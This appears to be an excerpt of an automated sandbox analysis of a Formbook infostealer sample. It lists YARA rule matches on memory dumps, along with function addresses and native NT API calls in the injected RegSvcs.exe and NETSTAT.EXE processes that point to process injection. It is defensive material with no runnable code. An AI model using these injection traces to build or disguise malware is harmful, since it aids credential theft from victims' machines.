Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.318189289.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: RegSvcs.exe PID: 5148, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: NETSTAT.EXE PID: 4844, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01314120 1_2_01314120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012FF900 1_2_012FF900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013199BF 1_2_013199BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131A830 1_2_0131A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013CE824 1_2_013CE824
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B1002 1_2_013B1002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013220A0 1_2_013220A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C20A8 1_2_013C20A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0130B090 1_2_0130B090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C28EC 1_2_013C28EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C2B28 1_2_013C2B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131A309 1_2_0131A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131AB40 1_2_0131AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0139CB4F 1_2_0139CB4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132EBB0 1_2_0132EBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132138B 1_2_0132138B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013A23E3 1_2_013A23E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B03DA 1_2_013B03DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013BDBD2 1_2_013BDBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132ABD8 1_2_0132ABD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131B236 1_2_0131B236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013AFA2B 1_2_013AFA2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C22AE 1_2_013C22AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B4AEF 1_2_013B4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012F0D20 1_2_012F0D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C2D07 1_2_013C2D07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C1D55 1_2_013C1D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01322581 1_2_01322581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B2D82 1_2_013B2D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0130D5E0 1_2_0130D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C25DD 1_2_013C25DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0130841F 1_2_0130841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131B477 1_2_0131B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013BD466 1_2_013BD466
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B4496 1_2_013B4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C1FF1 1_2_013C1FF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013CDFCE 1_2_013CDFCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01316E30 1_2_01316E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013BD616 1_2_013BD616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C2EF7 1_2_013C2EF7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_004012A4 1_2_004012A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00409ACC 1_2_00409ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0040B467 1_2_0040B467
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_004044C7 1_2_004044C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0042257F 1_2_0042257F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_004046E7 1_2_004046E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0040FE97 1_2_0040FE97
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035BAB40 10_2_035BAB40
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03662B28 10_2_03662B28
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035BA309 10_2_035BA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035CABD8 10_2_035CABD8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0365DBD2 10_2_0365DBD2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_036503DA 10_2_036503DA
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035CEBB0 10_2_035CEBB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0364FA2B 10_2_0364FA2B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_036622AE 10_2_036622AE
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0359F900 10_2_0359F900
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035B4120 10_2_035B4120
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035B99BF 10_2_035B99BF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0366E824 10_2_0366E824
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03651002 10_2_03651002
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035BA830 10_2_035BA830
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_036628EC 10_2_036628EC
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035AB090 10_2_035AB090
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_036620A8 10_2_036620A8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035C20A0 10_2_035C20A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03661FF1 10_2_03661FF1
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0366DFCE 10_2_0366DFCE
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035B6E30 10_2_035B6E30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0365D616 10_2_0365D616
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03662EF7 10_2_03662EF7
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03661D55 10_2_03661D55
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03662D07 10_2_03662D07
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03590D20 10_2_03590D20
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035AD5E0 10_2_035AD5E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_036625DD 10_2_036625DD
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035C2581 10_2_035C2581
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0365D466 10_2_0365D466
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035A841F 10_2_035A841F
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BC88B0 10_2_00BC88B0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BCE760 10_2_00BCE760
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BC2D90 10_2_00BC2D90
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BC9D30 10_2_00BC9D30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BE0E48 10_2_00BE0E48
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BC2FB0 10_2_00BC2FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 012FB150 appears 136 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 0359B150 appears 87 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339910 NtAdjustPrivilegesToken,LdrInitializeThunk, 1_2_01339910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013399A0 NtCreateSection,LdrInitializeThunk, 1_2_013399A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339860 NtQuerySystemInformation,LdrInitializeThunk, 1_2_01339860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339840 NtDelayExecution,LdrInitializeThunk, 1_2_01339840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013398F0 NtReadVirtualMemory,LdrInitializeThunk, 1_2_013398F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339A20 NtResumeThread,LdrInitializeThunk, 1_2_01339A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339A00 NtProtectVirtualMemory,LdrInitializeThunk, 1_2_01339A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339A50 NtCreateFile,LdrInitializeThunk, 1_2_01339A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339540 NtReadFile,LdrInitializeThunk, 1_2_01339540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013395D0 NtClose,LdrInitializeThunk, 1_2_013395D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339710 NtQueryInformationToken,LdrInitializeThunk, 1_2_01339710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013397A0 NtUnmapViewOfSection,LdrInitializeThunk, 1_2_013397A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339780 NtMapViewOfSection,LdrInitializeThunk, 1_2_01339780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339FE0 NtCreateMutant,LdrInitializeThunk, 1_2_01339FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339660 NtAllocateVirtualMemory,LdrInitializeThunk, 1_2_01339660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013396E0 NtFreeVirtualMemory,LdrInitializeThunk, 1_2_013396E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339950 NtQueueApcThread, 1_2_01339950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013399D0 NtCreateProcessEx, 1_2_013399D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339820 NtEnumerateKey, 1_2_01339820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0133B040 NtSuspendThread, 1_2_0133B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013398A0 NtWriteVirtualMemory, 1_2_013398A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339B00 NtSetValueKey, 1_2_01339B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0133A3B0 NtGetContextThread, 1_2_0133A3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339A10 NtQuerySection, 1_2_01339A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339A80 NtOpenDirectoryObject, 1_2_01339A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0133AD30 NtSetContextThread, 1_2_0133AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339520 NtWaitForSingleObject, 1_2_01339520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339560 NtWriteFile, 1_2_01339560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013395F0 NtQueryInformationFile, 1_2_013395F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339730 NtQueryVirtualMemory, 1_2_01339730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0133A710 NtOpenProcessToken, 1_2_0133A710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0133A770 NtOpenThread, 1_2_0133A770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339770 NtSetInformationFile, 1_2_01339770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339760 NtOpenProcess, 1_2_01339760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339610 NtEnumerateValueKey, 1_2_01339610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339670 NtQueryInformationProcess, 1_2_01339670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339650 NtQueryValueKey, 1_2_01339650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013396D0 NtCreateKey, 1_2_013396D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0041E087 NtAllocateVirtualMemory, 1_2_0041E087
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_004012A4 NtProtectVirtualMemory, 1_2_004012A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0041DEA7 NtCreateFile, 1_2_0041DEA7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0041DF57 NtReadFile, 1_2_0041DF57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0041DFD7 NtClose, 1_2_0041DFD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0041E083 NtAllocateVirtualMemory, 1_2_0041E083
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_004014E9 NtProtectVirtualMemory, 1_2_004014E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0041DEA1 NtCreateFile, 1_2_0041DEA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0041DFD1 NtClose, 1_2_0041DFD1
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9A50 NtCreateFile,LdrInitializeThunk, 10_2_035D9A50
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 10_2_035D9910
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D99A0 NtCreateSection,LdrInitializeThunk, 10_2_035D99A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9840 NtDelayExecution,LdrInitializeThunk, 10_2_035D9840
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9860 NtQuerySystemInformation,LdrInitializeThunk, 10_2_035D9860
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9710 NtQueryInformationToken,LdrInitializeThunk, 10_2_035D9710
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9FE0 NtCreateMutant,LdrInitializeThunk, 10_2_035D9FE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9780 NtMapViewOfSection,LdrInitializeThunk, 10_2_035D9780
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9650 NtQueryValueKey,LdrInitializeThunk, 10_2_035D9650
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9660 NtAllocateVirtualMemory,LdrInitializeThunk, 10_2_035D9660
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9610 NtEnumerateValueKey,LdrInitializeThunk, 10_2_035D9610
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D96D0 NtCreateKey,LdrInitializeThunk, 10_2_035D96D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D96E0 NtFreeVirtualMemory,LdrInitializeThunk, 10_2_035D96E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9540 NtReadFile,LdrInitializeThunk, 10_2_035D9540
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9560 NtWriteFile,LdrInitializeThunk, 10_2_035D9560
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D95D0 NtClose,LdrInitializeThunk, 10_2_035D95D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9B00 NtSetValueKey, 10_2_035D9B00
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035DA3B0 NtGetContextThread, 10_2_035DA3B0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9A10 NtQuerySection, 10_2_035D9A10
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9A00 NtProtectVirtualMemory, 10_2_035D9A00
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9A20 NtResumeThread, 10_2_035D9A20
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9A80 NtOpenDirectoryObject, 10_2_035D9A80
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9950 NtQueueApcThread, 10_2_035D9950
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D99D0 NtCreateProcessEx, 10_2_035D99D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035DB040 NtSuspendThread, 10_2_035DB040
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9820 NtEnumerateKey, 10_2_035D9820
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D98F0 NtReadVirtualMemory, 10_2_035D98F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D98A0 NtWriteVirtualMemory, 10_2_035D98A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035DA770 NtOpenThread, 10_2_035DA770
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9770 NtSetInformationFile, 10_2_035D9770
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9760 NtOpenProcess, 10_2_035D9760
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035DA710 NtOpenProcessToken, 10_2_035DA710
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9730 NtQueryVirtualMemory, 10_2_035D9730
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D97A0 NtUnmapViewOfSection, 10_2_035D97A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9670 NtQueryInformationProcess, 10_2_035D9670
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035DAD30 NtSetContextThread, 10_2_035DAD30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9520 NtWaitForSingleObject, 10_2_035D9520
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D95F0 NtQueryInformationFile, 10_2_035D95F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BDC8A0 NtClose, 10_2_00BDC8A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BDC820 NtReadFile, 10_2_00BDC820
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BDC870 NtDeleteFile, 10_2_00BDC870
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BDC950 NtAllocateVirtualMemory, 10_2_00BDC950
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BDC770 NtCreateFile, 10_2_00BDC770
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BDC89A NtClose, 10_2_00BDC89A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BDC8CA NtDeleteFile, 10_2_00BDC8CA
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BDC94C NtAllocateVirtualMemory, 10_2_00BDC94C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BDC76A NtCreateFile, 10_2_00BDC76A
Source: NHYGUnNN.exe Static PE information: No import functions for PE file found
